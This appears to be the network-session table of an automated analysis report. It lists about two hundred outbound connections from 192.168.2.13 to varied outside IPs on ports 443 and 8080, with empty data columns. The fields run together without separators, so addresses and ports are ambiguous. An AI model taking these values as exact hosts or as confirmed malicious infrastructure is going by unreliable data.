                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11134192.168.2.135352645.160.234.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11135192.168.2.1353032132.52.231.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11136192.168.2.1354934119.123.32.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11137192.168.2.1334278143.121.30.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11138192.168.2.1358644110.159.188.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11139192.168.2.1360202152.143.196.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11140192.168.2.1351498144.128.77.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11141192.168.2.1339980134.33.174.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11142192.168.2.1337548222.56.182.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11143192.168.2.1357786106.151.246.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11144192.168.2.1349116212.218.234.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11145192.168.2.134533841.167.100.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11146192.168.2.133516843.70.206.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11147192.168.2.1355536202.184.83.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11148192.168.2.1350338136.154.41.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11149192.168.2.1349080208.136.135.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11150192.168.2.1339992179.86.145.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11151192.168.2.1353286120.65.111.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11152192.168.2.1347808177.116.15.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11153192.168.2.1342488180.89.195.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11154192.168.2.1337612178.96.211.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11155192.168.2.135113868.181.84.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11156192.168.2.1357002152.74.148.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11157192.168.2.135642270.201.14.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11158192.168.2.1354402174.203.224.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11159192.168.2.134847013.191.167.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11160192.168.2.134382051.38.88.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11161192.168.2.13372888.147.60.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11162192.168.2.135815837.79.192.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11163192.168.2.133596232.148.95.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11164192.168.2.135033442.179.248.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11165192.168.2.1335746196.242.97.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11166192.168.2.1352058124.121.100.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11167192.168.2.134424662.199.183.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11168192.168.2.1349278219.46.242.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11169192.168.2.1333318140.147.254.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11170192.168.2.134734457.110.227.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11171192.168.2.1336664163.18.66.998080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11172192.168.2.1348222203.88.109.1468080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11173192.168.2.1340902201.16.190.968080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11174192.168.2.1350750161.140.37.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11175192.168.2.1337114159.47.234.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11176192.168.2.1348394138.17.35.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11177192.168.2.1340376201.188.150.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11178192.168.2.1340978120.243.95.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11179192.168.2.1351682104.28.96.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11180192.168.2.135597031.164.119.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11181192.168.2.134892668.173.114.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11182192.168.2.1343162162.75.102.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11183192.168.2.1343044180.219.128.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11184192.168.2.1343772185.197.159.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11185192.168.2.1340182180.237.193.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11186192.168.2.1344844137.74.242.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11187192.168.2.135553645.86.34.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11188192.168.2.135927046.152.173.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11189192.168.2.135682681.18.2.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11190192.168.2.1335592187.119.49.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11191192.168.2.1345626175.110.1.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192192.168.2.1348646216.217.166.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11193192.168.2.1345722130.119.102.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11194192.168.2.1356214126.56.249.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11195192.168.2.1352280119.47.101.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11196192.168.2.133279070.170.123.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11197192.168.2.1349728139.131.64.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11198192.168.2.1352596222.66.252.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11199192.168.2.1355614144.80.145.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11200192.168.2.134929458.228.82.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11201192.168.2.1358294118.15.51.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11202192.168.2.133904014.167.44.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11203192.168.2.1359458121.159.9.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11204192.168.2.1356602185.16.98.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11205192.168.2.1352254190.103.152.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11206192.168.2.134262498.89.226.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11207192.168.2.1344356101.84.85.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11208192.168.2.133340294.154.85.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11209192.168.2.1340928178.4.130.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11210192.168.2.13605481.1.220.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11211192.168.2.1333244157.228.6.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11212192.168.2.1341486116.148.42.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11213192.168.2.1337658104.88.7.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11214192.168.2.1352840191.62.8.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11215192.168.2.1356990155.166.1.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11216192.168.2.134840245.154.131.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11217192.168.2.1349612130.209.68.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11218192.168.2.1351086151.55.48.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11219192.168.2.1354536184.8.96.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11220192.168.2.1342000107.216.24.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11221192.168.2.1353438151.143.136.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11222192.168.2.1344870110.87.134.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11223192.168.2.1359496175.252.85.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11224192.168.2.1342874178.250.51.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11225192.168.2.1335666184.87.25.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11226192.168.2.13387088.33.45.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11227192.168.2.1353842221.153.166.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11228192.168.2.135569461.251.71.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11229192.168.2.1343316161.1.214.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11230192.168.2.135276269.148.141.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11231192.168.2.133896299.25.3.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11232192.168.2.1334192197.139.104.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11233192.168.2.136005496.122.177.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11234192.168.2.1334868144.206.250.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11235192.168.2.134646246.96.96.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11236192.168.2.1340154155.245.50.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11237192.168.2.135297245.230.84.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11238192.168.2.133944685.249.114.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11239192.168.2.1346330205.96.245.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11240192.168.2.134773423.213.181.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11241192.168.2.1353906178.253.183.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11242192.168.2.1335426103.18.253.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11243192.168.2.133450658.192.22.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11244192.168.2.134672676.203.123.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11245192.168.2.1335578106.23.115.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11246192.168.2.1345632198.254.41.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11247192.168.2.1335020153.48.102.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11248192.168.2.133665699.2.216.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11249192.168.2.1344038132.71.197.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11250192.168.2.1351122111.61.249.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11251192.168.2.1359062146.136.249.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11252192.168.2.1341636117.66.43.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11253192.168.2.1336072211.207.44.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11254192.168.2.13541628.29.56.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11255192.168.2.134114458.173.75.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11256192.168.2.133898292.48.145.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11257192.168.2.135297293.114.222.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11258192.168.2.135939278.175.50.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11259192.168.2.1350048194.36.149.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11260192.168.2.1352552130.104.39.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11261192.168.2.1336808183.110.148.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11262192.168.2.1351326193.137.128.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11263192.168.2.1341390140.72.250.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11264192.168.2.134770243.77.46.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11265192.168.2.1360738119.208.249.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11266192.168.2.1344312202.123.151.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11267192.168.2.133785054.137.46.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11268192.168.2.134427273.183.51.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11269192.168.2.1352518192.235.143.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11270192.168.2.133721644.6.155.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11271192.168.2.1349314119.107.173.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11272192.168.2.13522488.16.188.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11273192.168.2.1358976105.142.173.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11274192.168.2.1349952139.191.72.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11275192.168.2.1358146113.73.202.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11276192.168.2.135962497.147.109.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11277192.168.2.1347740179.241.13.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11278192.168.2.1336128188.200.96.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11279192.168.2.135165085.160.246.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11280192.168.2.135395253.253.221.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11281192.168.2.135333095.14.56.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11282192.168.2.136056666.115.166.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11283192.168.2.1334538173.35.189.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11284192.168.2.1341672130.193.123.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11285192.168.2.135464294.89.18.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11286192.168.2.135939218.247.103.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11287192.168.2.134030490.48.133.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11288192.168.2.134647094.240.167.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11289192.168.2.133326627.132.14.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11290192.168.2.1356538207.51.54.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11291192.168.2.1349224131.56.199.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11292192.168.2.135712869.169.240.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11293192.168.2.1354854172.125.195.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11294192.168.2.1350690132.122.205.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11295192.168.2.1359646122.184.176.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11296192.168.2.1352342161.32.161.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11297192.168.2.1343830141.45.78.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11298192.168.2.1346224156.17.136.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11299192.168.2.134618073.105.251.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11300192.168.2.1356552111.14.83.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11301192.168.2.1356704205.143.243.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11302192.168.2.1336644138.182.177.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11303192.168.2.1336666199.62.234.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11304192.168.2.134541038.166.49.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11305192.168.2.1332808167.135.108.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11306192.168.2.133728412.219.166.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11307192.168.2.1360134162.124.224.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11308192.168.2.1360476154.79.57.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11309192.168.2.1349214144.46.101.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11310192.168.2.134820878.150.102.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11311192.168.2.1345932141.17.219.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11312192.168.2.1354408146.68.82.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11313192.168.2.1352434143.171.193.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11314192.168.2.135000485.204.71.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11315192.168.2.133802685.35.107.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11316192.168.2.135348038.251.128.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11317192.168.2.135326486.107.237.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11318192.168.2.1352678172.213.127.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11319192.168.2.1349580140.134.9.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11320192.168.2.1359564190.40.215.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11321192.168.2.135068263.157.213.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11322192.168.2.1357526114.104.227.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11323192.168.2.1345916129.82.241.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11324192.168.2.1355490208.207.200.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11325192.168.2.133624062.91.87.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11326192.168.2.1336688220.207.9.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11327192.168.2.1359648222.48.61.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11328192.168.2.134385652.227.104.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11329192.168.2.134354096.16.26.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11330192.168.2.133501480.67.237.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11331192.168.2.1341902208.101.129.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11332192.168.2.1336800123.12.74.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11333192.168.2.1350950138.56.112.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11334192.168.2.1339790199.12.98.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11335192.168.2.1345052175.239.204.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11336192.168.2.1355944144.40.194.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11337192.168.2.133986471.72.173.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11338192.168.2.1359340164.191.115.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11339192.168.2.1334866218.216.119.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11340192.168.2.1347284151.71.70.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11341192.168.2.134693677.89.112.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11342192.168.2.134284686.142.182.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11343192.168.2.135901451.14.61.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11344192.168.2.1346004188.119.38.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11345192.168.2.135558647.206.186.153443
                                                  TimestampBytes transferredDirectionData


